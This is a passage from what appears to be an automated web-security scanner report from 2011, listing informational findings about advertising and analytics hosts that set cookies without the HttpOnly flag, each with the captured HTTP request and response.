GET /track/tag/6382.1008/img HTTP/1.1 Host: search.spotxchange.com Proxy-Connection: keep-alive Referer: http://img-cdn.mediaplex.com/0/17353/universal.html?page_name=netsuite_homepage&NetSuite_Homepage=1&mpuid= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK; partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo
Response
HTTP/1.1 302 Found Date: Tue, 06 Sep 2011 15:37:47 GMT Server: Apache P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"Set-Cookie: history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue, 06 Sep 2011 15:37:47 GMT Cache-Control: no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif Content-Type: text/html Content-Length: 0
13.185. http://server.iad.liveperson.net/hc/52793056/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://server.iad.liveperson.net
Path:
/hc/52793056/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/ HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056 LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/52793056/?&site=52793056&cmd=mTagKnockPage&lpCallId=802803296362-872958060353&protV=20&lpjson=1&id=5840223757&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1 Host: server.iad.liveperson.net Proxy-Connection: keep-alive Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=5110247826455,d=1314795678
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NETSet-Cookie: HumanClickACTIVE=1315323151587; expires=Wed, 07-Sep-2011 15:32:31 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Tue, 06 Sep 2011 15:32:31 GMTSet-Cookie: HumanClickSiteContainerID_52793056=STANDALONE; path=/hc/52793056 Set-Cookie: LivePersonID=-5110247826455-1315323140:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 15:32:31 GMT; path=/hc/52793056; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1484 lpConnLib.Process({"ResultSet": {"lpCallId":"802803296362-872958060353","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper...[SNIP]...
13.186. http://services.krxd.net/geoip
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://services.krxd.net
Path:
/geoip
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /geoip?root_name=KRUX.ST.geo HTTP/1.1 Host: services.krxd.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=28800 Content-Type: text/javascript Date: Tue, 06 Sep 2011 15:00:27 GMT Etag: "833b91a59b2962c75db21f499c2e9829d1408b57" P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: Krux CacheSet-Cookie: ServedBy=logger-b003; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:20:27 GMT Via: 1.1 logger-b003.krxd.net X-Age: 1 X-Cache: HIT X-Cache-Hits: 1 X-GeoIP: 50.23.123.106 X-Request-Backend: geoip X-Request-Time: D=543 t=1315321227510505 X-Served-By: logger-b003.krxd.net X-Served-By: logger-b003.krxd.net Content-Length: 75 Connection: keep-alive KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}
13.187. http://services.krxd.net/pixel.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://services.krxd.net
Path:
/pixel.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.gif?_kcp_d=cnbc.com&_kpref_=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh&_kuid=HK4OZLzp&_kpa_site=cnbc&_kpa_sect=home&_kpa_sub=homeus&_kpa_pageid=15839285&_kpa__c=homeus&_kpa_tandomad=none&_kpa_pm=1&kplt0=146&fired=beforeunload&_knifr=4&_kpid=d719e39d-e4be-4896-8d71-71012d0c51a0&_kcp_s=cnbc.com&_kcp_sc=home&_kcp_ssc=homeus HTTP/1.1 Host: services.krxd.net Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b005
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: private, no-cache, no-store Content-Type: image/gif Date: Tue, 06 Sep 2011 14:57:00 GMT Last-Modified: Thu, 25 Aug 2011 01:26:31 GMT P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: ApacheSet-Cookie: ServedBy=logger-b011; path=/; domain=.krxd.net; expires=Mon, 05-Mar-2012 04:17:00 GMT X-Request-Time: D=258 t=1315321020652677 X-Served-By: logger-b011.krxd.net Content-Length: 42 Connection: keep-alive GIF89a.............!.......,........@..D.;
13.188. http://sophelle.app5.hubspot.com/salog.js.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sophelle.app5.hubspot.com
Path:
/salog.js.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HUBSPOT159=219223212.0.0000; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /salog.js.aspx HTTP/1.1 Host: sophelle.app5.hubspot.com Proxy-Connection: keep-alive Referer: http://www.sophelle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-04%252010%253A55%253A54
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 575 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Tue, 06 Sep 2011 15:27:50 GMTSet-Cookie: HUBSPOT159=219223212.0.0000; path=/ var hsUse20Servers = true; var hsDayEndsIn = 45129; var hsWeekEndsIn = 477129; var hsMonthEndsIn = 2118729; var hsAnalyticsServer = "tracking.hubspot.com"; var hsTimeStamp = "2011-09-06 11:27...[SNIP]...
13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://statse.webtrendslive.com
Path:
/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAOAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAADpOZk46TmZOCQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAAA6TmZOOk5mTgAAAAA-; path=/; expires=Fri, 03-Sep-2021 16:45:46 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcscnww13100008eg8v7k3x39_3j3x/dcs.gif?&dcsdat=1315345545796&dcssip=www.cvs.com&dcsuri=/CVSApp/promoContent/promoLandingTemplate.jsp&dcsqry=%3FpromoLandingId=1350%26WT.mc_id=PS_ECBC_Google&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=Direct%2BBeauty%2BProduct&WT.co_f=50.23.123.106-4086325760.30173190&WT.vt_sid=50.23.123.106-4086325760.30173190.1315345545800&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=CVS%20Beauty%20Club%20ExtraCare%20offer%20deals%20cosmetics%20beauty%20extrabucks%20skincare%20and%20haircare&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fi=Yes&WT.fv=10.3&WT.tv=1.1.0&WT.dl=0&WT.es=www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp&WT.cg_s=1350&WT.sp=OTC%3BRx&WT.cg_n=Shared&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&cvs_serverinstance=prd-app-311&authStatus=0&promotion=1350_CVS%2BBeauty%2BClub%2BExtraCare%2Boffer%2Bdeals%2Bcosmetics%2Bbeauty%2Bextrabucks%2Bskincare%2Band%2Bhaircare&ExtraCare=NO HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTgAAAAA-
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 16:45:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAOAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAADpOZk46TmZOCQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAAA6TmZOOk5mTgAAAAA-; path=/; expires=Fri, 03-Sep-2021 16:45:46 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67 GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
13.190. http://t2.trackalyzer.com/trackalyze.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t2.trackalyzer.com
Path:
/trackalyze.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:loop=http%3A%2F%2Fwww%2Eshopify%2Ecom%2F%3Fgclid%3DCK6YvLv4iKsCFSE8gwod%2DiiK3g; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.shopify.com/%3Fgclid%3DCK6YvLv4iKsCFSE8gwod-iiK3g&i=1 HTTP/1.1 Host: t2.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=283117088618558
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 15:32:01 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR" Location: http://t2.trackalyzer.com/dot.gif Content-Length: 154 Content-Type: text/htmlSet-Cookie: loop=http%3A%2F%2Fwww%2Eshopify%2Ecom%2F%3Fgclid%3DCK6YvLv4iKsCFSE8gwod%2DiiK3g; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
13.191. http://t5.trackalyzer.com/trackalyze.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://t5.trackalyzer.com
Path:
/trackalyze.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:loop=http%3A%2F%2Fwww%2Etenzing%2Ecom%2Fatg%2Decommerce%2Dhosting%2Easp%3Futm%5Fsource%3DPG0008%2DATG%2DSolutions%26utm%5Fcampaign%3D001%26utm%5Fcontent%3D01%26utm%5Fterm%3D%252BATG%2520%252Bsolutions%26utm%5Fmedium%3DPPC; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.tenzing.com/atg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&i=18085 HTTP/1.1 Host: t5.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=283117088618558
Response
HTTP/1.1 302 Object moved Date: Tue, 06 Sep 2011 15:31:49 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR" X-Powered-By: ASP.NET Location: http://t5.trackalyzer.com/dot.gif Content-Length: 154 Content-Type: text/htmlSet-Cookie: loop=http%3A%2F%2Fwww%2Etenzing%2Ecom%2Fatg%2Decommerce%2Dhosting%2Easp%3Futm%5Fsource%3DPG0008%2DATG%2DSolutions%26utm%5Fcampaign%3D001%26utm%5Fcontent%3D01%26utm%5Fterm%3D%252BATG%2520%252Bsolutions%26utm%5Fmedium%3DPPC; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/ Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>
13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tag.admeld.com
Path:
/ad/iframe/677/cnbc/300x250/atf
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 1157 Content-Type: text/html Date: Tue, 06 Sep 2011 14:57:04 GMT Connection: closeSet-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com <html> <body bgcolor="#ffffff" style="margin:0;padding:0"> <div style="width:300px;height:250px;margin:0;border:0"> ...[SNIP]...
13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tag.admeld.com
Path:
/ad/iframe/677/cnbc/728x90/atf
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/id/15837856/site/14081545/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR" Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Length: 1147 Content-Type: text/html Date: Tue, 06 Sep 2011 14:57:38 GMT Connection: closeSet-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com <html> <body bgcolor="#ffffff" style="margin:0;padding:0"> <div style="width:728px;height:90px;margin:0;border:0"> ...[SNIP]...
13.194. http://tags.bluekai.com/site/3834
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tags.bluekai.com
Path:
/site/3834
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
